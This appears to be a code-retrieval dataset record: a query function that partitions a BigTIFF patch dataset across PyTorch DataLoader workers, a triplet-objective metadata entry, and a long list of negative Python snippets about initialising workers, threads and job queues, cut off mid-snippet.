def partition(worker_id): worker_info = torch.utils.data.get_worker_info() dataset = worker_info.dataset # Re-create BigTIFF objects that turned stale after serialization: for region in dataset.BigTIFFs: imgfile = dataset.BigTIFFs[region].Source dirID = dataset.BigTIFFs[region].DirectoryID patchSize = dataset.BigTIFFs[region].PatchSize[dirID] dataset.BigTIFFs[region] = Bigtiff(imgfile) dataset.BigTIFFs[region].setDirectory(dirID) dataset.BigTIFFs[region].setPatchSize(patchSize) # configure the dataset to only process the split workload per_worker = int(math.ceil(dataset.SampleID.shape[0] / float(worker_info.num_workers) )) sampleStart = worker_id * per_worker sampleEnd = sampleStart + per_worker dataset.SampleID = dataset.SampleID[sampleStart:sampleEnd]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_batch(self):\n pass", "def _initJobs(self):\n pass", "def start_loading(self):\n if self.loading:\n warnings.warn('Loader is already loading!')\n return\n \n assert self.batch_queue is not None\n batch_queue = self.batch_queue\n \n # Start worker processes\n worker_indices, worker_samples = self._get_worker_indices_samples()\n self.sample_queues = []\n for i, worker in enumerate(self.workers):\n if worker is not None:\n assert False, f'Something is very wrong with worker init.'\n else:\n sample_queue = python_mp.Queue()\n for ex_samples in worker_samples[i]:\n sample_queue.put(ex_samples)\n \n args = (sample_queue, batch_queue, self.example_creator_fn,\n self.batch_collate_fn)\n new_worker = Process(target=worker_fn, args=args)\n new_worker.daemon = True\n self.workers[i] = new_worker\n new_worker.start()\n self.loading = True", "def init_worker(X, X_shape, Y, Y_shape):\n arr_dict['X'] = X\n arr_dict['X_shape'] = X_shape\n arr_dict['Y'] = Y\n arr_dict['Y_shape'] = Y_shape", "def initialize(self):\n # set the maximum queue size (number of jobs to queue past the running number)\n self.maxQueueSize = self.runInfoDict['maxQueueSize']\n # defaults to None; if None, then use batchSize instead\n if self.maxQueueSize is None:\n self.maxQueueSize = self.runInfoDict['batchSize']\n # if requested max size less than 1, we can't do that, so take 1 instead\n if self.maxQueueSize < 1:\n self.raiseAWarning('maxQueueSize was set to be less than 1! Setting to 1...')\n self.maxQueueSize = 1\n self.raiseADebug('Setting maxQueueSize to', self.maxQueueSize)\n\n # initialize PBS\n with self.__queueLock:\n self.__running = [None]*self.runInfoDict['batchSize']\n self.__clientRunning = [None]*self.runInfoDict['batchSize']\n self._parallelLib = ParallelLibEnum.shared\n if self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] != ParallelLibEnum.distributed:\n self._parallelLib = self.runInfoDict['parallelMethod']\n elif self.runInfoDict['internalParallel'] or \\\n self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] == ParallelLibEnum.distributed:\n #If ParallelLibEnum.distributed or internalParallel True\n # than choose a library automatically.\n if _daskAvail:\n self._parallelLib = ParallelLibEnum.dask\n elif _rayAvail:\n self._parallelLib = ParallelLibEnum.ray\n else:\n self.raiseAWarning(\"Distributed Running requested but no parallel method found\")\n self._parallelLib = ParallelLibEnum.shared\n desiredParallelMethod = f\"parallelMethod: {self.runInfoDict['parallelMethod']} internalParallel: {self.runInfoDict['internalParallel']}\"\n self.raiseADebug(f\"Using parallelMethod: {self._parallelLib} because Input: {desiredParallelMethod} and Ray Availablility: {_rayAvail} and Dask Availabilitiy: {_daskAvail}\")\n if self._parallelLib == ParallelLibEnum.dask and not _daskAvail:\n self.raiseAnError(RuntimeError, f\"dask requested but not available. {desiredParallelMethod}\")\n if self._parallelLib == ParallelLibEnum.ray and not _rayAvail:\n self.raiseAnError(RuntimeError, f\"ray requested but not available. {desiredParallelMethod}\")\n # internal server is initialized only in case an internal calc is requested\n if not self.__isDistributedInitialized:\n self.__initializeDistributed()", "def init_worker(*shared_args_list):\n global SHARED_ARGS\n SHARED_ARGS = shared_args_list", "def evaluate_system__initialize_workers(opts, dictionary, features, labels):\n global evaluate_system__worker_cache\n evaluate_system__worker_cache = {\"opts\": opts, \"dictionary\": dictionary, \"features\": features, \"labels\": labels}", "def __init__(self, w, p, location, foldername, featurefiles, maskfiles, nclasses, kw={}, num_threads=4, batch_size=1):\n super(ThreadedDataSetCollection, self).__init__(w, p, location, foldername, featurefiles, maskfiles, nclasses, kw={})\n # data_kw, kw = compile_arguments(ThreadedDataSetCollection, kw, transitive=False)\n # for k, v in data_kw.items():\n # setattr(self, k, v)\n self.num_threads = num_threads\n self.batch_size = batch_size\n\n # self.batch_size = argget(kw, 'batchsize', 1)\n self.curr_thread = 0\n self._batch = [None for _ in range(self.num_threads)]\n self._batchlabs = [None for _ in range(self.num_threads)]\n self._preloadthreads = [Thread(target=self._preload_random_sample, args=(self.batch_size, it,)) for it in\n range(self.num_threads)]\n for t in self._preloadthreads:\n t.start()", "def __init__(self):\n self.num_mini_batches = 0", "def recognition_system__initialize_workers(opts, dictionary):\n global recognition_system__worker_cache\n recognition_system__worker_cache = {\"opts\": opts, \"dictionary\": dictionary}", "def init(number_of_workers=0):\n global _wq, _use_workers\n\n if number_of_workers:\n _use_workers = number_of_workers\n else:\n _use_workers = benchmark_workers()\n\n # if it is best to use zero workers, then use that.\n _wq = WorkerQueue(_use_workers)", "def _initialize_worker_prior(self):\r\n df = pd.read_csv(self._filepath, sep='\t')\r\n self._workers_id = df['!amt_worker_ids'].unique().tolist()\r\n for worker_id in self._workers_id:\r\n self._workers_prior[worker_id] = [self._c0, self._d0]", "def __init__(self, init_size=31):\n self.keys = build_array(init_size) # Parallel arrays - key[]\n self.values = build_array(init_size) # Parallel arrays - values[]\n self.size = init_size\n self.count = 0\n # Task3 counters\n self.count_collisions = 0\n self.total_probe_length = 0\n self.count_rehashes = 0\n self.longest_probe_chain = 0", "def __init__(self, args):\n self.train_img_file = os.path.join(args.data_dir, args.train_img_file)\n self.train_lbl_file = os.path.join(args.data_dir, args.train_lbl_file)\n self.test_img_file = os.path.join(args.data_dir, args.test_img_file)\n self.test_lbl_file = os.path.join(args.data_dir, args.test_lbl_file)\n self.batch_size = args.batch_size\n self.num_workers = args.data_workders\n self.shuffle = True\n self.dataset_name = args.dataset_name\n self.pin_memory = False #args.cuda\n\n # check dataset files exist\n files = [self.train_img_file, self.train_lbl_file,\n self.test_img_file, self.test_lbl_file]\n for file in files:\n if not os.path.isfile(file):\n msg = \"Data file not found. Please check the path \" +\\\n \"or download files using scripts/download_files.py \"\n raise IOError(msg)", "def __init__(self, worker):\n self._worker = worker\n self._jobs = Queue()\n self._results, self._errors = [], []\n self._jobfinished = Condition()", "def _get_executor_init(self, workers):\n raise NotImplementedError", "def worker_init_fn(self, worker_id: int) -> None:\n np.random.seed(np.random.get_state()[1][0] + worker_id + random.randint(1, 1000))\n\n worker_info = torch.utils.data.get_worker_info()\n worker_info.dataset.set_worker_id(worker_id)\n worker_info.dataset.examples, shard_stats = self.get_worker_shard(\n worker_info.dataset.examples, worker_info.num_workers, worker_id\n )\n worker_info.dataset.logger.info(\n f\"Stats for shard created for worker {worker_id}: \\n {shard_stats}\"\n )\n worker_info.dataset.create_language_index_mapping()", "def __init__(self, path_to_jobs, dset, job, sim, scale, stitch, ring, conn):\n self.path_to_jobs = path_to_jobs\n self.dset = dset\n self.job = job\n self.sim = sim\n self.scale = scale\n self.stitch = stitch\n self.ring = ring\n self.conn = conn\n\n self.worker = None\n self.header = None", "def initialize(self, setting):\n\n # record type mappings \n for worker in setting[\"workers\"]:\n wid = worker[\"id\"]\n flavor = worker[\"flavor\"]\n self.worker_flavor[wid] = flavor\n self.workers[wid] = Worker(wid, self.mode)\n\n self.workload = [0 for _ in range(len(self.workers))]\n\n # record neighboring nodes \n for u, v in setting[\"neighbor_map\"]:\n self.neighbors[u].add(v) \n self.neighbors[v].add(u)\n\n self.initialized = True", "def initialise_dataset_loader(\n self, data_param=None, task_param=None, data_partitioner=None):\n raise NotImplementedError", "def __init__(self, *args, **kwargs):\n # count the cores available on the local machine\n self.tasks = mp.cpu_count()\n super(ParallelPreprocessor, self).__init__(*args, **kwargs)", "def __init__(self, *args, wick_parallel=0, **kwargs):\n super().__init__(*args, **kwargs)\n self._wick_parallel = wick_parallel", "def setup_worker_threads(self):\n \n for thread_number in range(0, self.max_workers):\n worker = DeviceWorker(self, thread_number)\n self.worker_threads.append(worker)\n worker.start()", "def __init__(self, num_workers, mb=None):\n self._state = SharedState(mb=mb)\n self._procs = self._state.make_procs(num_workers)", "def init_worker(self, worker_id) :\n\n # since this is called in a separate process,\n # we need to get a consistent view of the settings\n startup.main(self.mode, self.rank)\n\n # initialize the random seed for this process\n # we don't use just the worker_id but also the rank\n # so we truly get different random numbers in all workers,\n # not restricted to the current pool\n # note that we get some entropy from the time\n # so different epochs get different data augmentations\n np.random.seed((hash(time())\n + (settings.RANK * torch.utils.data.get_worker_info().num_workers\n + worker_id)) % 2**32)", "def construct_threads(self, process, flag):\n\t\tself.parallel_threads.append(self.prepare_batch(process, flag))", "def setup_jobs(self):\n transfer_args = [\"analysis_type\", \"perturbation\", \"num_permutations\", \"permutation_test_statistic\", \"loss_function\",\n \"importance_significance_level\", \"window_search_algorithm\", \"window_effect_size_threshold\"]\n jobs = [None] * self.num_jobs\n for idx in range(self.num_jobs):\n # Create and launch condor job\n features_filename = constants.INPUT_FEATURES_FILENAME.format(self.args.output_dir, idx)\n input_files = [features_filename, self.args.model_filename, self.args.model_loader_filename, self.args.data_filename]\n job_dir = f\"{self.args.output_dir}/outputs_{idx}\"\n cmd = f\"python3 -m anamod.core.worker -worker_idx {idx}\"\n for arg in transfer_args:\n if hasattr(self.args, arg):\n cmd += f\" -{arg} {getattr(self.args, arg)}\"\n # Relative file paths for non-shared FS, absolute for shared FS\n for name, path in dict(output_dir=job_dir, features_filename=features_filename, model_filename=self.args.model_filename,\n model_loader_filename=self.args.model_loader_filename, data_filename=self.args.data_filename).items():\n cmd += f\" -{name} {os.path.abspath(path)}\" if self.args.shared_filesystem else f\" -{name} {os.path.basename(path)}\"\n job = CondorJobWrapper(cmd, input_files, job_dir, shared_filesystem=self.args.shared_filesystem,\n memory=f\"{self.args.memory_requirement}GB\", disk=f\"{self.args.disk_requirement}GB\",\n avoid_bad_hosts=self.args.avoid_bad_hosts, retry_arbitrary_failures=self.args.retry_arbitrary_failures,\n cleanup=self.args.cleanup)\n jobs[idx] = job\n return jobs", "async def _setup(self):\n\n Reporter.info('Setting up workers...')\n self.workers = [asyncio.Task(self._work(), loop=self.loop)\n for _ in range(self.MAX_WORKERS)]\n Reporter.info('Starting scan...')\n await self.q.join()", "def __init__(self):\n self.args = self._prepare_args(locals())\n self.requires_full_dataset_in_memory = False", "def worker_init_fn(worker_id: int) -> None:\n worker_info = torch.utils.data.get_worker_info()\n set_rnd(worker_info.dataset, seed=worker_info.seed) # type: ignore[union-attr]", "def __init__(self, run, expname):\n logger.debug('Initializing worker {}.'.format(rank))\n self.run = int(run)\n self.expname = expname\n bcast_var = None\n dsname = comm.bcast(bcast_var, root=0)\n print(dsname)\n \n print('********** Start setup.')\n t0 = time.time()\n self.dsIdx = psana.DataSource(str(dsname))\n logger.info('********** Datasource on rank {}: {}s'.format(rank, time.time()-t0))\n self.dsIdxRun = next(self.dsIdx.runs())\n self.parse_detectors()\n logger.info('Rank {} has datasource and detectors.'.format(rank))\n print('********** Setup on rank {}: {}s'.format(rank, time.time()-t0))\n return", "def __init__(self, pipeline):\n self._jobs = []\n self._active_jobs = []\n\n self._threads = []\n self._thread_index = {}\n self._thread_id = 1\n\n\n self.local_backend = Local()\n self.backend = None\n\n self.pipeline = pipeline", "def _generate_and_load_initial_batch(self, working_directory: Path):\n\n template_dir = Path(working_directory) / \"template_1\"\n template_dir.mkdir()\n # changes here should often be reflected in\n # data_generator_opts and data_loader_opts\n\n channel_decl = self.channel_configs[0]\n\n plugin_options = {\n \"pid\": \"0\",\n \"big_ids\": \"True\",\n }\n # if it's efficient to do the whole load in one go, let's just do that.\n if self.run_until.gap < MIN_PORTION_SIZE:\n num_records = self.run_until.gap\n else:\n num_records = 1 # smallest possible batch to get to parallelizing fast\n results = self._generate_and_load_batch(\n template_dir,\n channel_decl.org_config,\n {\n \"generator_yaml\": self.options.get(\"recipe\"),\n \"num_records\": num_records,\n \"num_records_tablename\": self.run_until.sobject_name or COUNT_REPS,\n \"loading_rules\": self.loading_rules,\n \"vars\": channel_decl.merge_recipe_options(self.recipe_options),\n \"plugin_options\": plugin_options,\n \"bulk_mode\": self.bulk_mode,\n },\n )\n self.update_running_totals_from_load_step_results(results)\n\n # rename directory to reflect real number of sets created.\n wd = SnowfakeryWorkingDirectory(template_dir)\n if self.run_until.sobject_name:\n self.sets_finished_while_generating_template = wd.get_record_counts()[\n self.run_until.sobject_name\n ]\n else:\n self.sets_finished_while_generating_template = num_records\n\n new_template_dir = data_loader_new_directory_name(template_dir, self.run_until)\n shutil.move(template_dir, new_template_dir)\n template_dir = new_template_dir\n\n # don't send data tables to child processes. All they\n # care about are ID->OID mappings\n wd = SnowfakeryWorkingDirectory(template_dir)\n self._cleanup_object_tables(*wd.setup_engine())\n\n return template_dir, wd.relevant_sobjects()", "def __init__(self, dataset, batch_size, n_threads=4,\n\t ten_crop=False, data_path='/home/dataset/', logger=None):\n\t\tself.dataset = dataset\n\t\tself.batch_size = batch_size\n\t\tself.n_threads = n_threads\n\t\tself.ten_crop = ten_crop\n\t\tself.data_path = data_path\n\t\tself.logger = logger\n\t\tself.dataset_root = data_path\n\t\t\n\t\tself.logger.info(\"|===>Creating data loader for \" + self.dataset)\n\t\t\n\t\tif self.dataset in [\"cifar100\"]:\n\t\t\tself.train_loader, self.test_loader = self.cifar(\n\t\t\t\tdataset=self.dataset)\n\n\t\telif self.dataset in [\"cifar10\"]:\n\t\t\tself.train_loader, self.test_loader = self.cifar(\n dataset=self.dataset)\n\t\t\n\t\telif self.dataset in [\"imagenet\"]:\n\t\t\tself.train_loader, self.test_loader = self.imagenet(\n\t\t\t\tdataset=self.dataset)\n\t\telse:\n\t\t\tassert False, \"invalid data set\"", "def __init__( self, app, nworkers, **kwds ):\n super( LwrJobRunner, self ).__init__( app, nworkers, runner_param_specs=LWR_PARAM_SPECS, **kwds )\n self._init_worker_threads()\n galaxy_url = self.runner_params.galaxy_url\n if galaxy_url:\n galaxy_url = galaxy_url.rstrip(\"/\")\n self.galaxy_url = galaxy_url\n self.__init_client_manager()\n if self.runner_params.url:\n # This is a message queue driven runner, don't monitor\n # just setup required callback.\n self.client_manager.ensure_has_status_update_callback(self.__async_update)\n else:\n self._init_monitor_thread()", "def __init__(self):\n # load files\n self.init_bin_start_time = load_last_bin_time()\n self.prev_value_cache = load_prev_val_cache()\n self.init_job_vals_dict = load_job_init_vals()\n\n config = load_config()\n self.database_domain = config[ConfigFields.DATABASE_DOMAIN]\n self.metrics = config[ConfigFields.METRICS]\n self.bin_duration = config[ConfigFields.BIN_DURATION]\n\n \"to be overwritten when server time is found in a job\"\n self.current_time = int(time.time())\n self.bin_start_times = None # updated below\n self.final_bin_end_time = None # updated below\n self.update_bin_times() # updates", "def __init__(\n self, batch_size: int = 64, num_workers: int = 0, **kwargs: Any\n ) -> None:\n super().__init__(EuroSAT100, batch_size, num_workers, **kwargs)", "def __init__(self, worker_device):\n self._worker_device = worker_device\n self._local_map = {}\n self._global_map = {}", "def __init__(self, task_manager, num_samples, num_shards, kernel, scale,\n bucket, directory):\n # Task parameters\n self.task_manager = task_manager\n self.num_samples = num_samples\n self.num_shards = num_shards\n\n # Patches paramters\n self.kernel = kernel\n self.scale = scale\n\n # Storage location\n self.bucket = bucket\n self.directory = directory", "def _call_initialization(self,\r\n input_fp,\r\n output_dir,\r\n params,\r\n job_prefix,\r\n poll_directly,\r\n suppress_submit_jobs):\r\n pass", "def _get_executor_init(self, workers):\n def pool_fn(seqs):\n pool = get_pool_class(True)(\n workers, initializer=init_pool_generator,\n initargs=(seqs, None, get_worker_id_queue()))\n _DATA_POOLS.add(pool)\n return pool\n\n return pool_fn", "def __init__(self, jobs, worker_names):\n self._all_jobs = [Job(_i) for _i in jobs]\n self._in_queue = self._all_jobs[:]\n self._finished_jobs = []\n self._poison_pills_received = 0\n\n self._workers = {_i: Worker([], [0]) for _i in worker_names}\n\n self._starttime = time.time()", "def _initJobs(self):\n super(DigestManager, self)._initJobs()\n conf = self.config.container_manager\n\n job4 = LoopingCall(self.performRequestedScan)\n job4.start(float(conf.activescan_interval))\n self.jobs.append(job4)", "def _get_executor_init(self, workers):\n def pool_fn(seqs):\n pool = get_pool_class(True)(\n workers, initializer=init_pool_generator,\n initargs=(seqs, self.random_seed, get_worker_id_queue()))\n _DATA_POOLS.add(pool)\n return pool\n return pool_fn", "def initialize_threading(self, worker_env=None):\n if not (os.path.exists(core.config.paths.zmq_public_keys_path) and\n os.path.exists(core.config.paths.zmq_private_keys_path)):\n logging.error(\"Certificates are missing - run generate_certificates.py script first.\")\n sys.exit(0)\n\n for i in range(NUM_PROCESSES):\n args = (i,)\n if worker_env:\n args = (i, worker_env,)\n\n pid = multiprocessing.Process(target=loadbalancer.Worker, args=args)\n pid.start()\n self.pids.append(pid)\n\n self.ctx = zmq.Context.instance()\n self.auth = ThreadAuthenticator(self.ctx)\n self.auth.start()\n self.auth.allow('127.0.0.1')\n self.auth.configure_curve(domain='*', location=core.config.paths.zmq_public_keys_path)\n\n self.load_balancer = loadbalancer.LoadBalancer(self.ctx)\n self.receiver = loadbalancer.Receiver(self.ctx)\n\n self.receiver_thread = threading.Thread(target=self.receiver.receive_results)\n self.receiver_thread.start()\n\n self.manager_thread = threading.Thread(target=self.load_balancer.manage_workflows)\n self.manager_thread.start()\n\n self.threading_is_initialized = True\n logger.debug('Controller threading initialized')\n gevent.sleep(0)", "def initialize(self,init):\n logger.info('*** initialize: worker id=%d',self._agent.wid)\n self.commands = {'initialize':None, 'before_do_work':None, 'after_do_work':None, 'finalize':None}\n self.commands.update(init.get(self._agent.wid,{}))\n exec_command(self.commands['initialize'])", "def __init__(\n self,\n local_worker: RolloutWorker,\n num_gpus: int = 1,\n lr=None, # deprecated.\n train_batch_size: int = 500,\n num_multi_gpu_tower_stacks: int = 1,\n minibatch_buffer_size: int = 1,\n num_sgd_iter: int = 1,\n learner_queue_size: int = 16,\n learner_queue_timeout: int = 300,\n num_data_load_threads: int = 16,\n _fake_gpus: bool = False):\n LearnerThread.__init__(self, local_worker, minibatch_buffer_size,\n num_sgd_iter, learner_queue_size,\n learner_queue_timeout)\n self.train_batch_size = train_batch_size\n\n # TODO: (sven) Allow multi-GPU to work for multi-agent as well.\n self.policy = self.local_worker.policy_map[DEFAULT_POLICY_ID]\n\n logger.info(\"MultiGPULearnerThread devices {}\".format(\n self.policy.devices))\n assert self.train_batch_size % len(self.policy.devices) == 0\n assert self.train_batch_size >= len(self.policy.devices),\\\n \"batch too small\"\n\n if set(self.local_worker.policy_map.keys()) != {DEFAULT_POLICY_ID}:\n raise NotImplementedError(\"Multi-gpu mode for multi-agent\")\n\n self.tower_stack_indices = list(range(num_multi_gpu_tower_stacks))\n\n self.idle_tower_stacks = queue.Queue()\n self.ready_tower_stacks = queue.Queue()\n for idx in self.tower_stack_indices:\n self.idle_tower_stacks.put(idx)\n for i in range(num_data_load_threads):\n self.loader_thread = _MultiGPULoaderThread(\n self, share_stats=(i == 0))\n self.loader_thread.start()\n\n self.minibatch_buffer = MinibatchBuffer(\n self.ready_tower_stacks, minibatch_buffer_size,\n learner_queue_timeout, num_sgd_iter)", "def __init__(self, n_jobs=1, verbose=True):\n self.n_jobs = n_jobs\n self.verbose = verbose", "def __init__process(self, n_cpu):\n global shared_slices\n global shared_data\n\n shared_slices_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_slices = np.frombuffer(shared_slices_base)\n shared_slices = shared_slices.reshape((len(self._q.R), -1))\n\n shared_grad_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_grad = np.frombuffer(shared_grad_base)\n shared_grad = shared_grad.reshape((len(self._q.R), -1))\n\n shared_data_base = mp.Array(ctypes.c_double,\n self._data.size,\n lock=False)\n shared_data = np.ctypeslib.as_array(shared_data_base)\n shared_data = shared_data.reshape(self._data.shape)\n shared_data[:] = self._data\n\n self._pool = mp.Pool(n_cpu)", "def init_workers(dist_mode):\n if dist_mode == 'ddp-file':\n from distributed.torch import init_workers_file\n return init_workers_file()\n elif dist_mode == 'ddp-mpi':\n from distributed.torch import init_workers_mpi\n return init_workers_mpi()\n elif dist_mode == 'cray':\n from distributed.cray import init_workers_cray\n return init_workers_cray()\n return 0, 1", "def init_workers(dist_mode):\n if dist_mode == 'ddp-file':\n from distributed.torch import init_workers_file\n return init_workers_file()\n elif dist_mode == 'ddp-mpi':\n from distributed.torch import init_workers_mpi\n return init_workers_mpi()\n elif dist_mode == 'cray':\n from distributed.cray import init_workers_cray\n return init_workers_cray()\n return 0, 1", "def init_mesh(self):\n inputs = self.inputs\n read_mesh = \"input_db\" in inputs\n if read_mesh:\n _lgr.info(\"NaluTaskRunner: initializing mesh meta data\")\n self.mesh.init_mesh_meta(inputs.input_db)\n\n for task in self.task_list:\n task.init_meta_data()\n\n read_time = 0.0\n if read_mesh:\n _lgr.info(\"NaluTaskRunner: populating bulk data\")\n read_time = self.mesh.init_mesh_bulk(inputs.input_db)\n else:\n self.mesh.meta.commit()\n self.read_time = read_time", "def _initJobs(self):\n assert not hasattr(self, 'jobs'), '_initJobs should only be called once'\n\n conf = self.config.container_manager\n self.jobs = []\n\n job1 = LoopingCall(self.updateOurContainer)\n job1.start(float(conf.updateoursd_interval))\n self.jobs.append(job1)\n\n job2 = LoopingCall(self.retrieveContainer)\n job2.start(float(conf.retrievesd_interval))\n self.jobs.append(job2)\n\n job3 = LoopingCall(self.relationshipRedemption)\n job3.start(float(conf.redemption_hours))\n self.jobs.append(job3)", "def __init__(self, init_value, add_value, iterations, **extra_args):\n\n self.init = init_value\n self.increment = add_value\n self.limit = iterations\n self.jobname = \"Gdemo_Iteration\"\n\n gc3libs.log.info(\"Calling DemoIteration.__init__() ... \")\n\n # create initial task and register it\n initial_task = GdemoApplication(self.init, self.increment, 0)\n SequentialTaskCollection.__init__(self, [initial_task], **extra_args)", "def __init__(self):\n self._event = multiprocessing.Event()\n self._queue = multiprocessing.JoinableQueue()\n self._results = multiprocessing.Queue()\n self._spawn_workers()\n self.population = self._seed_population()", "def __init__(self, **kwargs):\n allowed_kwargs = [\"memory\", \"verbose\", \"n_jobs\", \"feature_batch\"]\n\n for k in kwargs:\n if k not in allowed_kwargs:\n raise TypeError(f\"{k} not allowed as kwargs\")\n memory = kwargs.get(\"memory\", None)\n if isinstance(memory, bool):\n memory = tempfile.mkdtemp()\n logger.info(f\"Created temporary directory {memory}\")\n verbose = kwargs.get(\"verbose\", False)\n n_jobs = kwargs.get(\"n_jobs\", 0)\n\n self.memory = check_memory(memory)\n self.verbose = verbose\n # find out the number of parallel jobs\n if (n_jobs < 0) or (n_jobs > cpu_count()):\n n_jobs = cpu_count()\n logger.info(f\"Using {n_jobs} jobs for computation\")\n self.n_jobs = n_jobs\n self.feature_batch = get_feature_batch(kwargs.get(\"feature_batch\", None))", "def setUp(self) :\n self.longMessage = True\n logger = corAna.makeLogger(isTestMode=True,isMaster=True,isViewer=True,isServer=True,rank=0)\n isFirstWorker = True\n self.numTimes = 5\n numDataPointsThisWorker = 1\n\n self.workerData = corAna.WorkerData(logger, isFirstWorker, self.numTimes,\n numDataPointsThisWorker, addRemoveCallbackObject = None)", "def _init_train_loader(self):\n # Choose the right dataset type\n if self.config_args[\"num_members\"] > 1:\n class_dataset_wrapper = dataset_wrapper.MixMoDataset\n else:\n class_dataset_wrapper = dataset_wrapper.MSDADataset\n\n # Load augmentations\n self.traindatasetwrapper = class_dataset_wrapper(\n dataset=self.train_dataset,\n num_classes=int(self.config_args[\"data\"][\"num_classes\"]),\n num_members=self.config_args[\"num_members\"],\n dict_config=self.config_args[\"training\"][\"dataset_wrapper\"],\n properties=self.properties\n )\n\n # Build standard sampler\n _train_sampler = torch.utils.data.sampler.RandomSampler(\n data_source=self.traindatasetwrapper, ## only needed for its length\n num_samples=None,\n replacement=False,\n )\n\n # Wrap it with the repeating sampler used for multi-input models\n batch_sampler = batch_repetition_sampler.BatchRepetitionSampler(\n sampler=_train_sampler,\n batch_size=self.batch_size,\n num_members=self.config_args[\"num_members\"],\n drop_last=True,\n config_batch_sampler=self.config_args[\"training\"][\"batch_sampler\"]\n )\n\n self.train_loader = torch.utils.data.DataLoader(\n self.traindatasetwrapper,\n batch_sampler=batch_sampler,\n num_workers=self.num_workers,\n batch_size=1,\n shuffle=False,\n sampler=None,\n drop_last=False,\n pin_memory=True,\n )", "def worker_init_fn(worker_id, num_workers, rank, seed):\n\n worker_seed = num_workers * rank + worker_id + seed\n np.random.seed(worker_seed)\n random.seed(worker_seed)", "def worker_init_fn(worker_id, num_workers, rank, seed):\n\n worker_seed = num_workers * rank + worker_id + seed\n np.random.seed(worker_seed)\n random.seed(worker_seed)", "def initialize(self):\n \n casalog.origin(\"ParallelDataHelper\")\n\n # self._arg is populated inside ParallelTaskHelper._init_()\n self._arg['vis'] = os.path.abspath(self._arg['vis'])\n # MPI setting\n if self._mpi_cluster:\n self._cluster.start_services()\n \n if (self._arg['outputvis'] != \"\"):\n self._arg['outputvis'] = os.path.abspath(self._arg['outputvis']) \n\n outputPath, self.outputBase = os.path.split(self._arg['outputvis'])\n try:\n if self.outputBase[-1] == '.':\n self.outputBase = self.outputBase[:self.outputBase.rindex('.')]\n except ValueError:\n # outputBase must not have a trailing .\n pass\n\n if self.outputBase == '.' or self.outputBase == './':\n raise ValueError, 'Error dealing with outputvis'\n \n # The subMS are first saved inside a temporary directory\n self.dataDir = outputPath + '/' + self.outputBase+'.data'\n if os.path.exists(self.dataDir): \n shutil.rmtree(self.dataDir)\n\n os.mkdir(self.dataDir)", "def worker_init_fn(worker_id):\r\n base_seed = torch.IntTensor(1).random_().item()\r\n #print(worker_id, base_seed)\r\n np.random.seed(base_seed + worker_id)", "def initialize(self, myid, dispatcher, **model_params):\n self.lock_update = threading.Lock()\n self.jobsdone = 0 # how many jobs has this worker completed?\n # id of this worker in the dispatcher; just a convenience var for easy access/logging TODO remove?\n self.myid = myid\n self.dispatcher = dispatcher\n self.finished = False\n logger.info(\"initializing worker #%s\", myid)\n self.model = lsimodel.LsiModel(**model_params)", "def _LoadThreaded(self, vms, workload_file, **kwargs):\n results = []\n\n kwargs.setdefault('threads', self._default_preload_threads)\n if FLAGS.ycsb_record_count:\n kwargs.setdefault('recordcount', FLAGS.ycsb_record_count)\n if FLAGS.ycsb_field_count:\n kwargs.setdefault('fieldcount', FLAGS.ycsb_field_count)\n if FLAGS.ycsb_field_length:\n kwargs.setdefault('fieldlength', FLAGS.ycsb_field_length)\n\n with open(workload_file) as fp:\n workload_meta = ParseWorkload(fp.read())\n workload_meta.update(kwargs)\n workload_meta.update(\n stage='load',\n clients=len(vms) * kwargs['threads'],\n threads_per_client_vm=kwargs['threads'],\n workload_name=os.path.basename(workload_file),\n )\n self.workload_meta = workload_meta\n record_count = int(workload_meta.get('recordcount', '1000'))\n n_per_client = int(record_count) // len(vms)\n loader_counts = [\n n_per_client + (1 if i < (record_count % len(vms)) else 0)\n for i in range(len(vms))\n ]\n\n remote_path = posixpath.join(\n linux_packages.INSTALL_DIR, os.path.basename(workload_file)\n )\n\n args = [((vm, workload_file, remote_path), {}) for vm in dict.fromkeys(vms)]\n background_tasks.RunThreaded(PushWorkload, args)\n\n kwargs['parameter_files'] = [remote_path]\n\n def _Load(loader_index):\n start = sum(loader_counts[:loader_index])\n kw = copy.deepcopy(kwargs)\n kw.update(insertstart=start, insertcount=loader_counts[loader_index])\n if self.perclientparam is not None:\n kw.update(self.perclientparam[loader_index])\n results.append(self._Load(vms[loader_index], **kw))\n logging.info('VM %d (%s) finished', loader_index, vms[loader_index])\n\n start = time.time()\n background_tasks.RunThreaded(_Load, list(range(len(vms))))\n events.record_event.send(\n type(self).__name__,\n event='load',\n start_timestamp=start,\n end_timestamp=time.time(),\n metadata=copy.deepcopy(kwargs),\n )\n\n if len(results) != len(vms):\n raise IOError(\n 'Missing results: only {0}/{1} reported\\n{2}'.format(\n len(results), len(vms), results\n )\n )\n\n samples = []\n if FLAGS.ycsb_include_individual_results and len(results) > 1:\n for i, result in enumerate(results):\n samples.extend(\n ycsb_stats.CreateSamples(\n ycsb_result=result,\n ycsb_version=FLAGS.ycsb_version,\n include_command_line=_SHOULD_RECORD_COMMAND_LINE.value,\n result_type='individual',\n result_index=i,\n **workload_meta,\n )\n )\n\n # hdr histograms not collected upon load, only upon run\n combined = ycsb_stats.CombineResults(results, self.measurement_type, {})\n samples.extend(\n ycsb_stats.CreateSamples(\n ycsb_result=combined,\n ycsb_version=FLAGS.ycsb_version,\n include_histogram=FLAGS.ycsb_histogram,\n include_command_line=_SHOULD_RECORD_COMMAND_LINE.value,\n result_type='combined',\n **workload_meta,\n )\n )\n\n return samples", "def worker_init_fn(worker_id):\n worker_info = torch.utils.data.get_worker_info() # type: ignore\n if hasattr(worker_info.dataset, \"transform\") and hasattr(worker_info.dataset.transform, \"set_random_state\"):\n worker_info.dataset.transform.set_random_state(worker_info.seed % (2 ** 32))", "def __init__(self, dataset, num_workers=200):\n self.dataset = dataset\n self.cache = []\n print('Caching started ...')\n batch_size = min(len(dataset) // max(num_workers, 1), 8192)\n cacheloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,\n shuffle=False, drop_last=False, num_workers=num_workers,\n pin_memory=False)\n\n # Allocate memory:\n self.cache = torch.empty((len(self.dataset), *self.dataset[0][0].shape), pin_memory=PIN_MEMORY)\n\n pointer = 0\n for data in cacheloader:\n batch_length = data[0].shape[0]\n self.cache[pointer: pointer + 